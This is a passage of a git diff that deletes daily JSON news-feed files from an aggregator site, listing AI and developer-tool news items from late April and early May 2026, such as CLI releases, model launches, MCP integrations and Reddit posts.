"cli_tool", - "tool_update" - ], - "importance": 0.7, - "date": "2026-04-30T18:16:48.000Z", - "summary": "## What's Changed\n* fix(patch): cherry-pick 2194da2 to release/v0.40.0-pr-26153 to patch version v0.40.0 and create version 0.40.1 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/26268\n\n\n**Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.40.0...v0.40.1", - "category": "ai_tools" - }, - { - "title": "X announces a rebuilt ad platform powered by AI", - "url": "https://techcrunch.com/2026/04/30/x-announces-a-rebuilt-ad-platform-powered-by-ai/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-30T18:04:35.970Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Stripe introduces Link, a digital wallet that autonomous AI agents can use, too", - "url": "https://techcrunch.com/2026/04/30/stripe-link-digital-wallet-ai-agents-shopping/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-30T18:04:35.962Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "The MCP Era Feels Like Déjà Vu 1 day ago • 3", - "url": "https://huggingface.co/blog/Navid-AI/mcp-era-feels-like-deja-vu", - "source": "Hugging Face Blog", - "tags": [ - "mcp" - ], - "matching_tags": [ - "mcp" - ], - "importance": 1, - "date": "2026-04-30T18:04:33.505Z", - "summary": null, - "category": "ai_models" - }, - { - "title": "Most people use Claude Code like autocomplete. This tutorial shows how to use it like a system: agentic loops, subagents, MCP servers, real workflows. That’s the difference between “AI help” and real leverage. https:// claudedigest.com/tut…", - "url": "https://x.com/ClaudeDigest/status/2049902211292127462", - "source": "X / @claudedigest", - "tags": [ - "mcp" - ], - "matching_tags": [ - "mcp" - ], - "importance": 1, - "date": "2026-04-30T17:22:27.000Z", - "summary": "Most people use Claude Code like autocomplete. This tutorial shows how to use it like a system: agentic loops, subagents, MCP servers, real workflows. That’s the difference between “AI help” and real leverage. https:// claudedigest.com/tutorials/mdx/ mastering-claude-code …", - "category": "ai_tools" - }, - { - "title": "81% of dev teams use AI in testing, but the QE Lead is still human. Greenlyt changes that. Autonomous AI agent that owns your entire release quality process.", - "url": "https://x.com/polsia/status/2049901864381288455", - "source": "X / @polsia", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-30T17:21:04.000Z", - "summary": "81% of dev teams use AI in testing, but the QE Lead is still human. Greenlyt changes that. Autonomous AI agent that owns your entire release quality process.", - "category": "ai_tools" - }, - { - "title": "MiMo-V2.5-Pro Matches Opus 4.6 at 8x Lower Cost — Open Weights", - "url": "https://x.com/itsPaulAi/status/2049862276832715177", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-30T15:20:23.436Z", - "summary": "Braygent's take: MiMo-V2.5-Pro at 8x lower cost than Opus 4.6 is the open vs closed model story of 2026. The gap is closing fast.", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-01.json b/data/news-feed-2026-05-01.json deleted file mode 100644 index 989f34e..0000000 --- a/data/news-feed-2026-05-01.json +++ /dev/null @@ -1,265 +0,0 @@ -{ - "generated": "2026-06-05T00:44:37.161Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-01", - "article_count": 15, - "archived_story_count": 600, - "articles": [ - { - "title": "Built + open sourced anti-slopsquatting CLI", - "url": "https://reddit.com/r/ClaudeAI/comments/1t0ltr5/built_open_sourced_antislopsquatting_cli/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool", - "cli_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-05-01T06:56:08.000Z", - "summary": "TL;DR: built an open source CLI that scans your repository's manifest (package.json, requirements.txt, go.mod) files for indicators of slopsquatting or other supply chain attack indicators.\n\nRepo: https://github.com/zhendahu/dep-doctor\n\nThere's been a ton of supply chain attacks recently ([Axios](https://github.com/axios/axios/issues/10636), [LiteLLM](https://www.trendmicro.com/en_us/research/26/c/inside-litellm-supply-chain-compromise.html), [Trivy](https://www.paloaltonetworks.com/blog/cloud-s", - "category": "ai_tools" - }, - { - "title": "Vercel CLI @vercel/python-workers@0.0.21 released", - "url": "https://github.com/vercel/vercel/releases/tag/%40vercel/python-workers%400.0.21", - "source": "GitHub Releases · Vercel CLI", - "tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "importance": 0.62, - "date": "2026-05-01T22:29:33.000Z", - "summary": "### Patch Changes\n\n- 6935baa: Refactor Python queue sdk into `_queue/`\n- 574c9f1: [vercel-workers] Replaces retention_seconds and delay_seconds with retention and delay which support timedelta, e.g retention=timedelta(hours=6)\n", - "category": "ai_tools" - }, - { - "title": "Bonkers. Also, told y’all! OpenAI: “One week since the launch of GPT-5.5, and it’s already our strongest model launch yet” API revenue: “growing more than 2x faster than any prior release” “Codex doubled revenue in under 7 days as enterpri…", - "url": "https://x.com/firstadopter/status/2050264818972516799", - "source": "X / @firstadopter", - "tags": [ - "api_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-01T17:23:19.000Z", - "summary": "Bonkers. Also, told y’all! OpenAI: “One week since the launch of GPT-5.5, and it’s already our strongest model launch yet” API revenue: “growing more than 2x faster than any prior release” “Codex doubled revenue in under 7 days as enterprise demand for agentic coding tools..”", - "category": "ai_tools" - }, - { - "title": "One week since the launch of GPT-5.5, and it’s already our strongest model launch yet. API revenue is growing more than 2x faster than any prior release, while Codex doubled revenue in under seven days as enterprise demand for agentic codi…", - "url": "https://x.com/OpenAI/status/2050250926888468929", - "source": "X / @openai", - "tags": [ - "api_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-01T16:28:07.000Z", - "summary": "One week since the launch of GPT-5.5, and it’s already our strongest model launch yet. API revenue is growing more than 2x faster than any prior release, while Codex doubled revenue in under seven days as enterprise demand for agentic coding tools keeps climbing.", - "category": "ai_tools" - }, - { - "title": "Meta released their Ads MCP and CLI today – if you use Claude or ChatGPT you should install this asap (resources in comments). What makes this annou This is the kind of move that separates the builders from the watchers.", - "url": "https://x.com/yunara97/status/2050108352550592636", - "source": "X / @yunara97", - "tags": [ - "mcp", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-01T07:01:35.000Z", - "summary": "Meta released their Ads MCP and CLI today – if you use Claude or ChatGPT you should install this asap (resources in comments). What makes this annou This is the kind of move that separates the builders from the watchers.", - "category": "ai_tools" - }, - { - "title": "Hermes Agent Is Now in LM Studio — The Open-Source Agent Ecosystem Is Growing Fast", - "url": "https://x.com/NousResearch/status/2049878944007041210", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-01T02:15:34.945Z", - "summary": "Hermes Agent's integration with LM Studio brings it to one of the most popular local model runners. The open-source agent ecosystem is maturing quickly.", - "category": "ai_tools" - }, - { - "title": "Whohas – Command-line utility for cross-distro, cross-repository package search", - "url": "https://github.com/whohas/whohas", - "source": "Hacker News", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.99, - "date": "2026-05-01T15:01:08.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Cloud Skills Are Still Just Skills - How Anthropic no longer releases new skills, and gates them within the Cloud now with Ultraplan, Ultrareview, and Cloud Security.", - "url": "https://reddit.com/r/ClaudeAI/comments/1t0wlme/cloud_skills_are_still_just_skills_how_anthropic/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "product_launch", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "tool_update" - ], - "importance": 0.8600000000000001, - "date": "2026-05-01T15:26:45.000Z", - "summary": "https://vexjoy.com/posts/cloud-skills-are-still-just-skills/\n\nThe skill ecosystem’s strength is composability. I can take a review skill, pair it with a Go agent, wrap it in a pipeline that saves artifacts at phase boundaries. I can inspect every piece. When something fails, I can diagnose it because I can read the prompts. You can’t compose what you can’t read, and you can’t diagnose failures in a stage you can’t inspect.\n\nIf Anthropic ships more features this way, the ecosystem splits into ope", - "category": "ai_tools" - }, - { - "title": "Found Zero day Claude Desktop + Chromium bug need to know where to submit report.", - "url": "https://reddit.com/r/ClaudeAI/comments/1t0u20d/found_zero_day_claude_desktop_chromium_bug_need/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "developer_tool" - ], - "matching_tags": [ - "mcp", - "developer_tool" - ], - "importance": 0.7, - "date": "2026-05-01T13:52:27.000Z", - "summary": "Looking for official link / process to submit a vulnerability report for a high-risk official Claude Desktop + Chrome extension + native host + Cowork/MCP configuration that can become RAT-equivalent if a session, prompt chain, same-user process, or enabled extension is abused. \n\nPlease let me know where I can submit this report.", - "category": "ai_tools" - }, - { - "title": "Example of using the GodotIQ MCP with Coding Agent to create video games", - "url": "https://reddit.com/r/ClaudeAI/comments/1t0q8bf/example_of_using_the_godotiq_mcp_with_coding/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "agent_tool" - ], - "matching_tags": [ - "mcp", - "agent_tool" - ], - "importance": 0.7, - "date": "2026-05-01T11:04:05.000Z", - "summary": "I’ve developed an MCP server for Godot. Most coding agents in Godot today work blindly: they read files but don’t know where the nodes are in space, don’t understand the signals, and don’t see what calls what. Godotiq solves this, giving the agent a true understanding of the 2D/3D scene, the code, and the editor.\n\nTo test it, I gave it some free assets I found online and a prompt, and let it run for about an hour. It produced a mini twin-stick survivors-style game with waves, bosses, power-up ca", - "category": "ai_tools" - }, - { - "title": "Mobile App with Clade", - "url": "https://reddit.com/r/ClaudeAI/comments/1t0obje/mobile_app_with_clade/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "developer_tool", - "tool_update" - ], - "importance": 0.7, - "date": "2026-05-01T09:19:51.000Z", - "summary": "Just a quick question. Is building a mobile app like this actually a legit approach? I recently came across someone building fairly complex web apps, for example a geo quiz with full database integration, using this workflow: He generates all the HTML, CSS and JS through Claude (the AI), deploys it to Netlify, connects a database like Supabase or Firebase, and then uses \"Add to Homescreen\" so it looks and feels like a native mobile app. No framework, no GitHub repo, no CI/CD, no app store. And h", - "category": "ai_tools" - }, - { - "title": "Turbo v2.9.7 released", - "url": "https://github.com/vercel/turborepo/releases/tag/v2.9.7", - "source": "GitHub Releases · Turbo", - "tags": [ - "github_release", - "tool_update" - ], - "matching_tags": [ - "github_release", - "tool_update" - ], - "importance": 0.7, - "date": "2026-05-01T02:50:31.000Z", - "summary": "\n\n## What's Changed\n### eslint\n* chore: Upgrade dependencies to resolve their known vulnerabilities by @anthonyshew in https://github.com/vercel/turborepo/pull/12604\n### Examples\n* feat(sandbox): Bump @vercel/sandbox from v1 to beta by @marc-vercel in https://github.com/vercel/turborepo/pull/12595\n* chore: Update examples to Turbo 2.9.6 by @cursor[bot] in https://github.com/vercel/turborepo/pull/12600\n* examples", - "category": "ai_tools" - }, - { - "title": "Got tired of flying blind on Claude.ai usage, built a browser extension that surfaces token counts, cache timers, and rate limits", - "url": "https://reddit.com/r/ClaudeAI/comments/1t0ti7h/got_tired_of_flying_blind_on_claudeai_usage_built/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 0.62, - "date": "2026-05-01T13:30:04.000Z", - "summary": "I kept hitting the 5-hour limit out of nowhere and had no idea how close I was to the context window filling up mid-conversation. The fact that [Claude.ai](http://Claude.ai) shows you basically nothing about your actual usage drove me nuts, especially when I'd be deep in a long chat and suddenly get cut off.\n\n\n\nSo I built a Chrome extension that adds a small dashboard to [claude.ai](http://claude.ai) showing real-time token counts per message, total context used, the prompt cache window timer (s", - "category": "ai_tools" - }, - { - "title": "You can now connect your Meta ads to Claude via MCP. Really good workflow I've been testing (with Higgsfield): > Analyse ad account top performers > Use Claude to come up with variations > Generate them in Higgsfield (statics) > Animate th…", - "url": "https://x.com/_stephenbishop_/status/2050263244020015404", - "source": "X / @_stephenbishop_", - "tags": [ - "mcp" - ], - "matching_tags": [ - "mcp" - ], - "importance": 1, - "date": "2026-05-01T17:17:04.000Z", - "summary": "You can now connect your Meta ads to Claude via MCP. Really good workflow I've been testing (with Higgsfield): > Analyse ad account top performers > Use Claude to come up with variations > Generate them in Higgsfield (statics) > Animate them > Re-launch on Meta", - "category": "ai_tools" - }, - { - "title": "VEED Launches AI Video Creation Tools — Helping Creators Produce at Scale", - "url": "https://x.com/veedstudio", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-01T14:45:55.101Z", - "summary": "VEED continues developing AI video creation tools enabling content creators to produce polished video content at scale without professional editing expertise. The platform targets the growing market for AI-assisted video content creation for social and marketing applications.", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-02.json b/data/news-feed-2026-05-02.json deleted file mode 100644 index acfd8ba..0000000 --- a/data/news-feed-2026-05-02.json +++ /dev/null @@ -1,273 +0,0 @@ -{ - "generated": "2026-06-05T00:44:37.317Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-02", - "article_count": 15, - "archived_story_count": 459, - "articles": [ - { - "title": "@WesRoth: Meta Launches Ads MCP — Claude and ChatGPT Can Now Manage Meta Ad Accounts", - "url": "https://x.com/WesRoth/status/2050606311440531809", - "source": "Aligned News (Scoble)", - "tags": [ - "mcp", - "product_launch", - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "mcp", - "product_launch", - "cli_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-02T16:23:29.285Z", - "summary": "Meta launched its Ads MCP and CLI, creating a direct bridge for frontier AI models like Claude and ChatGPT to access and interact with the Meta Ads ecosystem through natural language.", - "category": "ai_tools" - }, - { - "title": "I built a Claude Code skill that gives Claude real local time + session tracking (open source, one-line install)", - "url": "https://reddit.com/r/ClaudeAI/comments/1t1xoca/i_built_a_claude_code_skill_that_gives_claude/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-02T18:27:13.000Z", - "summary": "Built this with Claude Code over a few sessions open sourcing it. Claude has no built-in clock. Each session starts cold, training data is frozen in time, and when Claude says \"the current time\" it's hallucinating. Got tired of correcting it, so I built time-anchor. **What it does:** \\- Auto-detects your timezone on install, no API key, no network call \\- Reads the host system clock when you ask for the time (the trick: Python scripts in the skill can read the OS clock when Claude executes them via bash, Claude itself stays clockless, but it now has a tool it can query) \\- Logs every session start/end so Claude can answer \"how long have we been talking\" or \"what did I say 20 minutes ago\" \\- Persists in a local JSON file (or shares with another memory plugin via $TIME\\_ANCHOR\\_MEMORY\\_PATH) \\- \\~85% of users get auto-detected (Windows tzutil, Linux /etc/localtime, $TZ). The remaining 15% type a city/country and get a paginated picker \\- covering \\~200 countries with their full IANA zone lists. Free + open source. MIT licensed, no telemetry, all state local. No paid tier, nothing to sign up for. #### Install (any OS, no git, no SSH, no plugin marketplace setup): **Windows (PowerShel…", - "category": "ai_tools" - }, - { - "title": "Parallelogram – a strict linter for LLM fine-tuning datasets (catches broken data before your GPU run starts)", - "url": "https://reddit.com/r/StableDiffusion/comments/1t1sf5z/parallelogram_a_strict_linter_for_llm_finetuning/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update", - "open_source", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-02T15:07:24.000Z", - "summary": "Fine-tuning frameworks assume your data is correctly formatted. None of them enforce it. The result is broken training runs discovered after the compute is spent.\n\nParallelogram is a CLI tool that validates fine-tuning datasets before any training starts. Strict hard-blocks on role sequence errors, empty turns, context window violations, duplicates, and mojibake. Exits 0 on clean data, exits 1 on errors — CI/CD friendly.\n\nApache 2.0, local-first, zero network calls.\n\ngithub.com/Thatayotlhe04/Par", - "category": "creative_tools" - }, - { - "title": "Tried running Claude Code with local LLMs via Ollama — ended up subscribing to Pro anyway. But now I can't disconnect from the local server.", - "url": "https://reddit.com/r/ClaudeAI/comments/1t1vjd0/tried_running_claude_code_with_local_llms_via/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-02T17:07:21.000Z", - "summary": "I've been experimenting with using Ollama to run Claude Code locally with models like Gemma 4, thinking I could avoid API costs. However, I quickly realised these models aren't really optimised for Claude Code's agentic workflows — they tend to get stuck in thinking loops and don't follow Claude Code's expected output structure well. So I ended up subscribing to Claude Pro anyway. The problem now is that even after logging into my Anthropic account through the terminal, Claude Code still connects to the local Ollama server no matter how many times I restart the terminal or VSCode. Just wondering how this can be solved, and also is it possible to run both local LLMs and claude models at the same time?", - "category": "ai_tools" - }, - { - "title": "Tool orchestration > model benchmarks. MCP connects any model to any tool without API keys. That's the real shift: system design matters more than intelligence scores. Built 13 tools across Claude, Codex, local. Same shipping pace. Archite…", - "url": "https://x.com/HudBeer/status/2050622456436818111", - "source": "X / @hudbeer", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-02T17:04:26.000Z", - "summary": "Tool orchestration > model benchmarks. MCP connects any model to any tool without API keys. That's the real shift: system design matters more than intelligence scores. Built 13 tools across Claude, Codex, local. Same shipping pace. Architecture wins.", - "category": "ai_tools" - }, - { - "title": "Weekly Meal Planning Fully Automated with Claude and Migros MCP", - "url": "https://x.com/hslu_aiml/status/2049100936287498456", - "source": "Aligned News (Scoble)", - "tags": [ - "mcp", - "tool_update" - ], - "matching_tags": [ - "mcp", - "tool_update" - ], - "importance": 1, - "date": "2026-05-02T16:28:06.379Z", - "summary": "A developer automated their weekly meal plan entirely using Claude and Migros's MCP integration, demonstrating how AI agents can handle grocery and meal planning end-to-end.", - "category": "ai_tools" - }, - { - "title": "@ValsAI: GPT-5.5 Now #1 on Terminal Bench 2 — Updated Results Show +11% Improvement", - "url": "https://x.com/ValsAI/status/2050240263420072446", - "source": "Aligned News (Scoble)", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-02T16:21:16.690Z", - "summary": "Vals AI updated GPT-5.5's results and it is now the #1 model on Terminal Bench 2, improving by +11%. It remains #2 on the overall Vals Index.", - "category": "ai_tools" - }, - { - "title": "I built \"Semvec\": A Constant-Cost Semantic Memory for LLMs (Looking for testers!)", - "url": "https://reddit.com/r/ClaudeAI/comments/1t1ti3q/i_built_semvec_a_constantcost_semantic_memory_for/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "agent_tool" - ], - "matching_tags": [ - "mcp", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-02T15:49:05.000Z", - "summary": "Hey everyone, If you build LLM applications, autonomous agents, or just use Claude/Cursor for coding, you've probably hit this wall: Conversation history grows infinitely, token costs explode, latency skyrockets, and eventually, the LLM starts forgetting early context anyway. To fix this, I built semvec. It replaces unbounded conversation histories with a fixed-size semantic state combined with a tiered, content-aware memory (short/medium/long-term). The result: The cost and latency of every LLM call stay constant. Turn 10 and Turn 10,000 carry the exact same input footprint. In 48-turn benchmarks, it yields roughly a 76% token reduction while retaining all structured access to decisions, error patterns, and prior context. Here is what you get: \\- Constant-size compressed context: Token-reduced LLM context that stops growing. \\- Tiered memory with selective forgetting: Frequently accessed older memories outlive never-touched newer ones. \\- Drop-in chat proxy: Wrap any OpenAI-compatible LLM (vLLM, Ollama, OpenRouter) and get compressed context for free. \\- Coding-agent compaction (MCP): Persistent memory across coding sessions. It comes with an MCP server for Claude Code & Curs…", - "category": "ai_tools" - }, - { - "title": "The OpenAI Prompting Guide Has Been Updated. 🙌🏻 Check It Out 👏🏻", - "url": "https://reddit.com/r/ChatGPT/comments/1t1tgok/the_openai_prompting_guide_has_been_updated_check/", - "source": "Reddit r/ChatGPT", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 1, - "date": "2026-05-02T15:47:33.000Z", - "summary": "A great resource for learning how to prompt better and get the most out of ChatGPT 5.5: https://developers.openai.com/api/docs/guides/prompt-guidance?model=gpt-5.5 🤙🏻", - "category": "ai_tools" - }, - { - "title": "I reverse-engineered the Perplexity app and built an MCP that turns your Perplexity/Comet account into a Claude MCP, so Claude can search like crazy and read 200+ sources in one answer with your personal account subscription without API product needed. [Experiment - Educational Purpose]", - "url": "https://reddit.com/r/ClaudeAI/comments/1t1pdqc/i_reverseengineered_the_perplexity_app_and_built/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-02T13:05:38.000Z", - "summary": "Here's video showcase: [***https://youtu.be/wErgEe9Pgqo***](https://youtu.be/wErgEe9Pgqo)", - "category": "ai_tools" - }, - { - "title": "Kept having dreams last night about the game system... I think why this is weighing so heavy is because I don't want to launch with any Gemini api calls(cheap, fast, practically free but I dunno if scalable) so I'm actually building base t…", - "url": "https://x.com/genondemand3d/status/2050539325763293222", - "source": "X / @genondemand3d", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-02T11:34:07.000Z", - "summary": "Kept having dreams last night about the game system... I think why this is weighing so heavy is because I don't want to launch with any Gemini api calls(cheap, fast, practically free but I dunno if scalable) so I'm actually building base training and mcp and hopefully it'll grow", - "category": "ai_tools" - }, - { - "title": "xAI Launches Grok 4.3 with Low-Cost Voice Cloning API Elon Musk’s xAI has released Grok 4.3, featuring a new, high-fidelity voice cloning suite at a price point significantly lower than ElevenLabs or OpenAI. The release emphasizes real-tim…", - "url": "https://x.com/mehedi_u/status/2050462001571504588", - "source": "X / @mehedi_u", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-05-02T06:26:51.000Z", - "summary": "xAI Launches Grok 4.3 with Low-Cost Voice Cloning API Elon Musk’s xAI has released Grok 4.3, featuring a new, high-fidelity voice cloning suite at a price point significantly lower than ElevenLabs or OpenAI. The release emphasizes real-time speed, targeting developers building", - "category": "ai_tools" - }, - { - "title": "Hermes Just Beat Claude Code in GitHub Stars and Nobody Is Talking About It", - "url": "https://x.com/aakashgupta/status/2050349093969694825", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-01T23:49:55.116Z", - "summary": "Braygent highlights the Hermes GitHub star milestone as the underreported open source AI agent story of the week, arguing it signals a turning point in open versus closed AI competition.", - "category": "ai_tools" - }, - { - "title": "Pika Just Let You Give Claude a Face and Make Videos Through Conversation", - "url": "https://x.com/pika_labs/status/2050294291998933455", - "source": "Aligned News (Scoble)", - "tags": [ - "mcp", - "tool_update" - ], - "matching_tags": [ - "mcp", - "tool_update" - ], - "importance": 1, - "date": "2026-05-01T23:49:55.116Z", - "summary": "Braygent highlights the Pika MCP as a genuinely new Claude integration category that gives the assistant a custom identity and full video production capabilities, not just tool access.", - "category": "ai_tools" - }, - { - "title": "NVIDIA's Open Source Enterprise AI Agent Security Layer Is More Important Than People Realize", - "url": "https://x.com/NVIDIAAI/status/2050336285428998202", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-01T23:49:55.116Z", - "summary": "Braygent argues NVIDIA's open source OpenShell is the infrastructure unlock for enterprise AI agent deployment, with the open source design being crucial for security team auditability.", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-03.json b/data/news-feed-2026-05-03.json deleted file mode 100644 index d4165b8..0000000 --- a/data/news-feed-2026-05-03.json +++ /dev/null @@ -1,247 +0,0 @@ -{ - "generated": "2026-06-05T00:44:37.493Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-03", - "article_count": 15, - "archived_story_count": 379, - "articles": [ - { - "title": "EasyUI – built over many months, late nights, and real dedication. Now 100% open-source.", - "url": "https://reddit.com/r/StableDiffusion/comments/1t2toa5/easyui_built_over_many_months_late_nights_and/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-03T18:40:22.000Z", - "summary": "• Run ComfyUI workflows (txt2img, img2img, img2vid, vid2vid and more) • Execute Python scripts • Chat with LLMs (Ollama) • Templates & favorite templates • Plugin system • Tag system, wildcards, chants • Mask editor & crop tool • Drawing & coloring tools (inpaint) • Sessions management • Dark mode & login system • Media upload (drag & drop) • Audio trimming & txt2voice • Multi-language (Arabic, English, Chinese, Japanese) • Edit & resend prompts • Regenerate & resend images • Negative prompt support • And much more... Made with effort. Released with love. 🔗 [https://github.com/kigy1/EasyUI]", - "category": "creative_tools" - }, - { - "title": "Hermes Agent Hit 100K GitHub Stars — The Fastest-Growing Open-Source AI Agent Has Won the Community", - "url": "https://x.com/Shaughnessy119/status/2042339593647800404", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-03T14:53:59.070Z", - "summary": "Braygent argues Hermes Agent's 100K GitHub stars represent a clear developer community vote for reliability over feature velocity, with implications for how all AI developer tools should prioritize update stability.", - "category": "ai_tools" - }, - { - "title": "Vibe coded and made a Knights of New Order like free open sourced tool for proof-checking deepbooru tags", - "url": "https://reddit.com/r/StableDiffusion/comments/1t2kou2/vibe_coded_and_made_a_knights_of_new_order_like/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-05-03T12:54:04.000Z", - "summary": "\\--- **Deepbooru TagWalker Beta** **---** **Most tagging tools out there are image-centric** — you open an image, then edit its tags. TagWalker flips that around. You pick a tag. The program walks you through every image in your dataset, one by one, and asks: does this image have this tag correctly applied? Yes or No. Then it moves to the next image automatically. By the time you finish a tag, you've seen it against every single image in your dataset — consistently, in sequence, without losing your place. No clicking around. No forgetting which images you already checked. \\--- This is the program I had always wished existed. The program works the very similar way to **Knights of New Order** minigame on civit.AI. My first time ever vibe coding project with Qwen 3.6 27B Q4 on RTX 3090. Not as easy as I initially thought. Program is uploaded on github under MIT license. [https://github.com/Elliezrah/deepbooru-tagwalker/releases](https://github.com/Elliezrah/deepbooru-tagwalker/releases) Let me know what you think.", - "category": "creative_tools" - }, - { - "title": "OpenClaw v2026.5.2 released", - "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.5.2", - "source": "GitHub Releases · OpenClaw", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.91, - "date": "2026-05-02T23:37:55.000Z", - "summary": "\n### Highlights\n\n- External plugin installation, update, doctor repair, dependency reporting, and artifact metadata now cover the npm-first cutover, stale configured installs, missing package payloads, and beta-channel plugin fallback. Thanks @vincentkoc.\n- Gateway and agent hot paths are leaner across startup, session listing, task maintenance, prompt prep, plugin loading, tool descriptor planning, filesystem guards, and large runtime configs.\n- Control UI and WebChat are more resilient across ", - "category": "ai_tools" - }, - { - "title": "pnpm v11.0.4 released", - "url": "https://github.com/pnpm/pnpm/releases/tag/v11.0.4", - "source": "GitHub Releases · pnpm", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.84, - "date": "2026-05-02T23:32:37.000Z", - "summary": "## Patch Changes\r\n\r\n* Fixed `pnpm ci` not reinstalling workspace package `node_modules` directories after the clean step [#11427](https://github.com/pnpm/pnpm/issues/11427).\r\n* Remove pnpm's workspace state file when cleaning node\\_modules so `pnpm ci` performs a fresh install after the clean step.\r\n* Do not remove `pnpm-lock.yaml` during `pnpm clean` when `lockfile: true` is configured in `pnpm-workspace.yaml`. The lockfile is only removed when the `--lockfile` option is passed to `pnpm clean`.", - "category": "ai_tools" - }, - { - "title": "Turbo v2.9.8 released", - "url": "https://github.com/vercel/turborepo/releases/tag/v2.9.8", - "source": "GitHub Releases · Turbo", - "tags": [ - "github_release", - "tool_update" - ], - "matching_tags": [ - "github_release", - "tool_update" - ], - "importance": 0.7, - "date": "2026-05-03T02:41:00.000Z", - "summary": "\n\n## What's Changed\n### @turbo/repository\n* chore: Update to Rust 1.95.0 by @ognevny in https://github.com/vercel/turborepo/pull/12636\n### Changelog\n* release(turborepo): 2.9.7 by @github-actions[bot] in https://github.com/vercel/turborepo/pull/12679\n* test: Add regression for gitignored output restore by @anthonyshew in https://github.com/vercel/turborepo/pull/12681\n* docs: Clarify root task guidance by @anthon", - "category": "ai_tools" - }, - { - "title": "Open Source AI Agents | Github/Repo List | [2025] Feb 21, 2025 • 31", - "url": 